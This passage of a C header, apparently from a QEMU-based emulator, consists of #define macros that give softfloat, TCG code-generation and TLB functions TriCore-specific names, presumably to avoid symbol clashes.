#define float32_max float32_max_tricore #define float32_maxnum float32_maxnum_tricore #define float32_maxnummag float32_maxnummag_tricore #define float64_min float64_min_tricore #define float64_minnum float64_minnum_tricore #define float64_minnummag float64_minnummag_tricore #define float64_max float64_max_tricore #define float64_maxnum float64_maxnum_tricore #define float64_maxnummag float64_maxnummag_tricore #define float16_compare float16_compare_tricore #define float16_compare_quiet float16_compare_quiet_tricore #define float32_compare float32_compare_tricore #define float32_compare_quiet float32_compare_quiet_tricore #define float64_compare float64_compare_tricore #define float64_compare_quiet float64_compare_quiet_tricore #define float16_scalbn float16_scalbn_tricore #define float32_scalbn float32_scalbn_tricore #define float64_scalbn float64_scalbn_tricore #define float16_sqrt float16_sqrt_tricore #define float32_sqrt float32_sqrt_tricore #define float64_sqrt float64_sqrt_tricore #define float16_default_nan float16_default_nan_tricore #define float32_default_nan float32_default_nan_tricore #define float64_default_nan float64_default_nan_tricore #define float128_default_nan float128_default_nan_tricore #define float16_silence_nan float16_silence_nan_tricore #define float32_silence_nan float32_silence_nan_tricore #define float64_silence_nan float64_silence_nan_tricore #define float16_squash_input_denormal float16_squash_input_denormal_tricore #define float32_squash_input_denormal float32_squash_input_denormal_tricore #define float64_squash_input_denormal float64_squash_input_denormal_tricore #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_tricore #define roundAndPackFloatx80 roundAndPackFloatx80_tricore #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_tricore #define int32_to_floatx80 int32_to_floatx80_tricore #define int32_to_float128 int32_to_float128_tricore #define int64_to_floatx80 int64_to_floatx80_tricore #define int64_to_float128 int64_to_float128_tricore #define uint64_to_float128 uint64_to_float128_tricore #define float32_to_floatx80 float32_to_floatx80_tricore #define float32_to_float128 float32_to_float128_tricore #define float32_rem float32_rem_tricore #define float32_exp2 float32_exp2_tricore #define float32_log2 float32_log2_tricore #define float32_eq float32_eq_tricore #define float32_le float32_le_tricore #define float32_lt float32_lt_tricore #define float32_unordered float32_unordered_tricore #define float32_eq_quiet float32_eq_quiet_tricore #define float32_le_quiet float32_le_quiet_tricore #define float32_lt_quiet float32_lt_quiet_tricore #define float32_unordered_quiet float32_unordered_quiet_tricore #define float64_to_floatx80 float64_to_floatx80_tricore #define float64_to_float128 float64_to_float128_tricore #define float64_rem float64_rem_tricore #define float64_log2 float64_log2_tricore #define float64_eq float64_eq_tricore #define float64_le float64_le_tricore #define float64_lt float64_lt_tricore #define float64_unordered float64_unordered_tricore #define float64_eq_quiet float64_eq_quiet_tricore #define float64_le_quiet float64_le_quiet_tricore #define float64_lt_quiet float64_lt_quiet_tricore #define float64_unordered_quiet float64_unordered_quiet_tricore #define floatx80_to_int32 floatx80_to_int32_tricore #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_tricore #define floatx80_to_int64 floatx80_to_int64_tricore #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_tricore #define floatx80_to_float32 floatx80_to_float32_tricore #define floatx80_to_float64 floatx80_to_float64_tricore #define floatx80_to_float128 floatx80_to_float128_tricore #define floatx80_round floatx80_round_tricore #define floatx80_round_to_int floatx80_round_to_int_tricore #define floatx80_add floatx80_add_tricore #define floatx80_sub floatx80_sub_tricore #define floatx80_mul floatx80_mul_tricore #define floatx80_div floatx80_div_tricore #define floatx80_rem floatx80_rem_tricore #define floatx80_sqrt floatx80_sqrt_tricore #define floatx80_eq floatx80_eq_tricore #define floatx80_le floatx80_le_tricore #define floatx80_lt floatx80_lt_tricore #define floatx80_unordered floatx80_unordered_tricore #define floatx80_eq_quiet floatx80_eq_quiet_tricore #define floatx80_le_quiet floatx80_le_quiet_tricore #define floatx80_lt_quiet floatx80_lt_quiet_tricore #define floatx80_unordered_quiet floatx80_unordered_quiet_tricore #define float128_to_int32 float128_to_int32_tricore #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_tricore #define float128_to_int64 float128_to_int64_tricore #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_tricore #define float128_to_uint64 float128_to_uint64_tricore #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_tricore #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_tricore #define float128_to_uint32 float128_to_uint32_tricore #define float128_to_float32 float128_to_float32_tricore #define float128_to_float64 float128_to_float64_tricore #define float128_to_floatx80 float128_to_floatx80_tricore #define float128_round_to_int float128_round_to_int_tricore #define float128_add float128_add_tricore #define float128_sub float128_sub_tricore #define float128_mul float128_mul_tricore #define float128_div float128_div_tricore #define float128_rem float128_rem_tricore #define float128_sqrt float128_sqrt_tricore #define float128_eq float128_eq_tricore #define float128_le float128_le_tricore #define float128_lt float128_lt_tricore #define float128_unordered float128_unordered_tricore #define float128_eq_quiet float128_eq_quiet_tricore #define float128_le_quiet float128_le_quiet_tricore #define float128_lt_quiet float128_lt_quiet_tricore #define float128_unordered_quiet float128_unordered_quiet_tricore #define floatx80_compare floatx80_compare_tricore #define floatx80_compare_quiet floatx80_compare_quiet_tricore #define float128_compare float128_compare_tricore #define float128_compare_quiet float128_compare_quiet_tricore #define floatx80_scalbn floatx80_scalbn_tricore #define float128_scalbn float128_scalbn_tricore #define softfloat_init softfloat_init_tricore #define tcg_optimize tcg_optimize_tricore #define gen_new_label gen_new_label_tricore #define tcg_can_emit_vec_op tcg_can_emit_vec_op_tricore #define tcg_expand_vec_op tcg_expand_vec_op_tricore #define tcg_register_jit tcg_register_jit_tricore #define tcg_tb_insert tcg_tb_insert_tricore #define tcg_tb_remove tcg_tb_remove_tricore #define tcg_tb_lookup tcg_tb_lookup_tricore #define tcg_tb_foreach tcg_tb_foreach_tricore #define tcg_nb_tbs tcg_nb_tbs_tricore #define tcg_region_reset_all tcg_region_reset_all_tricore #define tcg_region_init tcg_region_init_tricore #define tcg_code_size tcg_code_size_tricore #define tcg_code_capacity tcg_code_capacity_tricore #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_tricore #define tcg_malloc_internal tcg_malloc_internal_tricore #define tcg_pool_reset tcg_pool_reset_tricore #define tcg_context_init tcg_context_init_tricore #define tcg_tb_alloc tcg_tb_alloc_tricore #define tcg_prologue_init tcg_prologue_init_tricore #define tcg_func_start tcg_func_start_tricore #define tcg_set_frame tcg_set_frame_tricore #define tcg_global_mem_new_internal tcg_global_mem_new_internal_tricore #define tcg_temp_new_internal tcg_temp_new_internal_tricore #define tcg_temp_new_vec tcg_temp_new_vec_tricore #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_tricore #define tcg_temp_free_internal tcg_temp_free_internal_tricore #define tcg_const_i32 tcg_const_i32_tricore #define tcg_const_i64 tcg_const_i64_tricore #define tcg_const_local_i32 tcg_const_local_i32_tricore #define tcg_const_local_i64 tcg_const_local_i64_tricore #define tcg_op_supported tcg_op_supported_tricore #define tcg_gen_callN tcg_gen_callN_tricore #define tcg_op_remove tcg_op_remove_tricore #define tcg_emit_op tcg_emit_op_tricore #define tcg_op_insert_before tcg_op_insert_before_tricore #define tcg_op_insert_after tcg_op_insert_after_tricore #define tcg_cpu_exec_time tcg_cpu_exec_time_tricore #define tcg_gen_code tcg_gen_code_tricore #define tcg_gen_op1 tcg_gen_op1_tricore #define tcg_gen_op2 tcg_gen_op2_tricore #define tcg_gen_op3 tcg_gen_op3_tricore #define tcg_gen_op4 tcg_gen_op4_tricore #define tcg_gen_op5 tcg_gen_op5_tricore #define tcg_gen_op6 tcg_gen_op6_tricore #define tcg_gen_mb tcg_gen_mb_tricore #define tcg_gen_addi_i32 tcg_gen_addi_i32_tricore #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_tricore #define tcg_gen_subi_i32 tcg_gen_subi_i32_tricore #define tcg_gen_andi_i32 tcg_gen_andi_i32_tricore #define tcg_gen_ori_i32 tcg_gen_ori_i32_tricore #define tcg_gen_xori_i32 tcg_gen_xori_i32_tricore #define tcg_gen_shli_i32 tcg_gen_shli_i32_tricore #define tcg_gen_shri_i32 tcg_gen_shri_i32_tricore #define tcg_gen_sari_i32 tcg_gen_sari_i32_tricore #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_tricore #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_tricore #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_tricore #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_tricore #define tcg_gen_muli_i32 tcg_gen_muli_i32_tricore #define tcg_gen_div_i32 tcg_gen_div_i32_tricore #define tcg_gen_rem_i32 tcg_gen_rem_i32_tricore #define tcg_gen_divu_i32 tcg_gen_divu_i32_tricore #define tcg_gen_remu_i32 tcg_gen_remu_i32_tricore #define tcg_gen_andc_i32 tcg_gen_andc_i32_tricore #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_tricore #define tcg_gen_nand_i32 tcg_gen_nand_i32_tricore #define tcg_gen_nor_i32 tcg_gen_nor_i32_tricore #define tcg_gen_orc_i32 tcg_gen_orc_i32_tricore #define tcg_gen_clz_i32 tcg_gen_clz_i32_tricore #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_tricore #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_tricore #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_tricore #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_tricore #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_tricore #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_tricore #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_tricore #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_tricore #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_tricore #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_tricore #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_tricore #define tcg_gen_extract_i32 tcg_gen_extract_i32_tricore #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_tricore #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_tricore #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_tricore #define tcg_gen_add2_i32 tcg_gen_add2_i32_tricore #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_tricore #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_tricore #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_tricore #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_tricore #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_tricore #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_tricore #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_tricore #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_tricore #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_tricore #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_tricore #define tcg_gen_smin_i32 tcg_gen_smin_i32_tricore #define tcg_gen_umin_i32 tcg_gen_umin_i32_tricore #define tcg_gen_smax_i32 tcg_gen_smax_i32_tricore #define tcg_gen_umax_i32 tcg_gen_umax_i32_tricore #define tcg_gen_abs_i32 tcg_gen_abs_i32_tricore #define tcg_gen_addi_i64 tcg_gen_addi_i64_tricore #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_tricore #define tcg_gen_subi_i64 tcg_gen_subi_i64_tricore #define tcg_gen_andi_i64 tcg_gen_andi_i64_tricore #define tcg_gen_ori_i64 tcg_gen_ori_i64_tricore #define tcg_gen_xori_i64 tcg_gen_xori_i64_tricore #define tcg_gen_shli_i64 tcg_gen_shli_i64_tricore #define tcg_gen_shri_i64 tcg_gen_shri_i64_tricore #define tcg_gen_sari_i64 tcg_gen_sari_i64_tricore #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_tricore #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_tricore #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_tricore #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_tricore #define tcg_gen_muli_i64 tcg_gen_muli_i64_tricore #define tcg_gen_div_i64 tcg_gen_div_i64_tricore #define tcg_gen_rem_i64 tcg_gen_rem_i64_tricore #define tcg_gen_divu_i64 tcg_gen_divu_i64_tricore #define tcg_gen_remu_i64 tcg_gen_remu_i64_tricore #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_tricore #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_tricore #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_tricore #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_tricore #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_tricore #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_tricore #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_tricore #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_tricore #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_tricore #define tcg_gen_not_i64 tcg_gen_not_i64_tricore #define tcg_gen_andc_i64 tcg_gen_andc_i64_tricore #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_tricore #define tcg_gen_nand_i64 tcg_gen_nand_i64_tricore #define tcg_gen_nor_i64 tcg_gen_nor_i64_tricore #define tcg_gen_orc_i64 tcg_gen_orc_i64_tricore #define tcg_gen_clz_i64 tcg_gen_clz_i64_tricore #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_tricore #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_tricore #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_tricore #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_tricore #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_tricore #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_tricore #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_tricore #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_tricore #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_tricore #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_tricore #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_tricore #define tcg_gen_extract_i64 tcg_gen_extract_i64_tricore #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_tricore #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_tricore #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_tricore #define tcg_gen_add2_i64 tcg_gen_add2_i64_tricore #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_tricore #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_tricore #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_tricore #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_tricore #define tcg_gen_smin_i64 tcg_gen_smin_i64_tricore #define tcg_gen_umin_i64 tcg_gen_umin_i64_tricore #define tcg_gen_smax_i64 tcg_gen_smax_i64_tricore #define tcg_gen_umax_i64 tcg_gen_umax_i64_tricore #define tcg_gen_abs_i64 tcg_gen_abs_i64_tricore #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_tricore #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_tricore #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_tricore #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_tricore #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_tricore #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_tricore #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_tricore #define tcg_gen_exit_tb tcg_gen_exit_tb_tricore #define tcg_gen_goto_tb tcg_gen_goto_tb_tricore #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_tricore #define check_exit_request check_exit_request_tricore #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_tricore #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_tricore #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_tricore #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_tricore #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_tricore #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_tricore #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_tricore #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_tricore #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_tricore #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_tricore #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_tricore #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_tricore #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_tricore #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_tricore #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_tricore #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_tricore #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_tricore #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_tricore #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_tricore #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_tricore #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_tricore #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_tricore #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_tricore #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_tricore #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_tricore #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_tricore #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_tricore #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_tricore #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_tricore #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_tricore #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_tricore #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_tricore #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_tricore #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_tricore #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_tricore #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_tricore #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_tricore #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_tricore #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_tricore #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_tricore #define simd_desc simd_desc_tricore #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_tricore #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_tricore #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_tricore #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_tricore #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_tricore #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_tricore #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_tricore #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_tricore #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_tricore #define tcg_gen_gvec_2 tcg_gen_gvec_2_tricore #define tcg_gen_gvec_2i tcg_gen_gvec_2i_tricore #define tcg_gen_gvec_2s tcg_gen_gvec_2s_tricore #define tcg_gen_gvec_3 tcg_gen_gvec_3_tricore #define tcg_gen_gvec_3i tcg_gen_gvec_3i_tricore #define tcg_gen_gvec_4 tcg_gen_gvec_4_tricore #define tcg_gen_gvec_mov tcg_gen_gvec_mov_tricore #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_tricore #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_tricore #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_tricore #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_tricore #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_tricore #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_tricore #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_tricore #define tcg_gen_gvec_not tcg_gen_gvec_not_tricore #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_tricore #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_tricore #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_tricore #define tcg_gen_gvec_add tcg_gen_gvec_add_tricore #define tcg_gen_gvec_adds tcg_gen_gvec_adds_tricore #define tcg_gen_gvec_addi tcg_gen_gvec_addi_tricore #define tcg_gen_gvec_subs tcg_gen_gvec_subs_tricore #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_tricore #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_tricore #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_tricore #define tcg_gen_gvec_sub tcg_gen_gvec_sub_tricore #define tcg_gen_gvec_mul tcg_gen_gvec_mul_tricore #define tcg_gen_gvec_muls tcg_gen_gvec_muls_tricore #define tcg_gen_gvec_muli tcg_gen_gvec_muli_tricore #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_tricore #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_tricore #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_tricore #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_tricore #define tcg_gen_gvec_smin tcg_gen_gvec_smin_tricore #define tcg_gen_gvec_umin tcg_gen_gvec_umin_tricore #define tcg_gen_gvec_smax tcg_gen_gvec_smax_tricore #define tcg_gen_gvec_umax tcg_gen_gvec_umax_tricore #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_tricore #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_tricore #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_tricore #define tcg_gen_gvec_neg tcg_gen_gvec_neg_tricore #define tcg_gen_gvec_abs tcg_gen_gvec_abs_tricore #define tcg_gen_gvec_and tcg_gen_gvec_and_tricore #define tcg_gen_gvec_or tcg_gen_gvec_or_tricore #define tcg_gen_gvec_xor tcg_gen_gvec_xor_tricore #define tcg_gen_gvec_andc tcg_gen_gvec_andc_tricore #define tcg_gen_gvec_orc tcg_gen_gvec_orc_tricore #define tcg_gen_gvec_nand tcg_gen_gvec_nand_tricore #define tcg_gen_gvec_nor tcg_gen_gvec_nor_tricore #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_tricore #define tcg_gen_gvec_ands tcg_gen_gvec_ands_tricore #define tcg_gen_gvec_andi tcg_gen_gvec_andi_tricore #define tcg_gen_gvec_xors tcg_gen_gvec_xors_tricore #define tcg_gen_gvec_xori tcg_gen_gvec_xori_tricore #define tcg_gen_gvec_ors tcg_gen_gvec_ors_tricore #define tcg_gen_gvec_ori tcg_gen_gvec_ori_tricore #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_tricore #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_tricore #define tcg_gen_gvec_shli tcg_gen_gvec_shli_tricore #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_tricore #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_tricore #define tcg_gen_gvec_shri tcg_gen_gvec_shri_tricore #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_tricore #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_tricore #define tcg_gen_gvec_sari tcg_gen_gvec_sari_tricore #define tcg_gen_gvec_shls tcg_gen_gvec_shls_tricore #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_tricore #define tcg_gen_gvec_sars tcg_gen_gvec_sars_tricore #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_tricore #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_tricore #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_tricore #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_tricore #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_tricore #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_tricore #define vec_gen_2 vec_gen_2_tricore #define vec_gen_3 vec_gen_3_tricore #define vec_gen_4 vec_gen_4_tricore #define tcg_gen_mov_vec tcg_gen_mov_vec_tricore #define tcg_const_zeros_vec tcg_const_zeros_vec_tricore #define tcg_const_ones_vec tcg_const_ones_vec_tricore #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_tricore #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_tricore #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_tricore #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_tricore #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_tricore #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_tricore #define tcg_gen_dupi_vec tcg_gen_dupi_vec_tricore #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_tricore #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_tricore #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_tricore #define tcg_gen_ld_vec tcg_gen_ld_vec_tricore #define tcg_gen_st_vec tcg_gen_st_vec_tricore #define tcg_gen_stl_vec tcg_gen_stl_vec_tricore #define tcg_gen_and_vec tcg_gen_and_vec_tricore #define tcg_gen_or_vec tcg_gen_or_vec_tricore #define tcg_gen_xor_vec tcg_gen_xor_vec_tricore #define tcg_gen_andc_vec tcg_gen_andc_vec_tricore #define tcg_gen_orc_vec tcg_gen_orc_vec_tricore #define tcg_gen_nand_vec tcg_gen_nand_vec_tricore #define tcg_gen_nor_vec tcg_gen_nor_vec_tricore #define tcg_gen_eqv_vec tcg_gen_eqv_vec_tricore #define tcg_gen_not_vec tcg_gen_not_vec_tricore #define tcg_gen_neg_vec tcg_gen_neg_vec_tricore #define tcg_gen_abs_vec tcg_gen_abs_vec_tricore #define tcg_gen_shli_vec tcg_gen_shli_vec_tricore #define tcg_gen_shri_vec tcg_gen_shri_vec_tricore #define tcg_gen_sari_vec tcg_gen_sari_vec_tricore #define tcg_gen_cmp_vec tcg_gen_cmp_vec_tricore #define tcg_gen_add_vec tcg_gen_add_vec_tricore #define tcg_gen_sub_vec tcg_gen_sub_vec_tricore #define tcg_gen_mul_vec tcg_gen_mul_vec_tricore #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_tricore #define tcg_gen_usadd_vec tcg_gen_usadd_vec_tricore #define tcg_gen_sssub_vec tcg_gen_sssub_vec_tricore #define tcg_gen_ussub_vec tcg_gen_ussub_vec_tricore #define tcg_gen_smin_vec tcg_gen_smin_vec_tricore #define tcg_gen_umin_vec tcg_gen_umin_vec_tricore #define tcg_gen_smax_vec tcg_gen_smax_vec_tricore #define tcg_gen_umax_vec tcg_gen_umax_vec_tricore #define tcg_gen_shlv_vec tcg_gen_shlv_vec_tricore #define tcg_gen_shrv_vec tcg_gen_shrv_vec_tricore #define tcg_gen_sarv_vec tcg_gen_sarv_vec_tricore #define tcg_gen_shls_vec tcg_gen_shls_vec_tricore #define tcg_gen_shrs_vec tcg_gen_shrs_vec_tricore #define tcg_gen_sars_vec tcg_gen_sars_vec_tricore #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_tricore #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_tricore #define tb_htable_lookup tb_htable_lookup_tricore #define tb_set_jmp_target tb_set_jmp_target_tricore #define cpu_exec cpu_exec_tricore #define cpu_loop_exit_noexc cpu_loop_exit_noexc_tricore #define cpu_reloading_memory_map cpu_reloading_memory_map_tricore #define cpu_loop_exit cpu_loop_exit_tricore #define cpu_loop_exit_restore cpu_loop_exit_restore_tricore #define cpu_loop_exit_atomic cpu_loop_exit_atomic_tricore #define tlb_init tlb_init_tricore #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_tricore #define tlb_flush tlb_flush_tricore #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_tricore #define tlb_flush_all_cpus tlb_flush_all_cpus_tricore #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_tricore #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_tricore #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_tricore #define tlb_flush_page tlb_flush_page_tricore #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_tricore #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_tricore #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_tricore #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_tricore #define tlb_protect_code tlb_protect_code_tricore #define tlb_unprotect_code tlb_unprotect_code_tricore #define tlb_reset_dirty tlb_reset_dirty_tricore #define tlb_set_dirty tlb_set_dirty_tricore #define 